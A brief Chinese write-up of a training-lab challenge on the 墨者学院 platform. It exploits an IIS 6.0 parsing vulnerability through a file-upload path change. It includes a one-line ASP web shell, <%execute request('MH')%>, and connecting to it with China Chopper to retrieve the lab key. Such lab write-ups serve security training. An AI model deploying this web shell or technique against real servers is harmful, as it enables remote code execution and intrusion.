墨者学院-内部文件上传系统漏洞分析溯源 首先正常上传一个txt文件,抓包,发现是iis6.0,了解到这个版本的服务器有个解析漏洞,来加以利用 于是我们更改一下upload的路径木马我们已经预先写道txt里了<%execute request(“MH”)%> 菜刀链接这个地址,找到key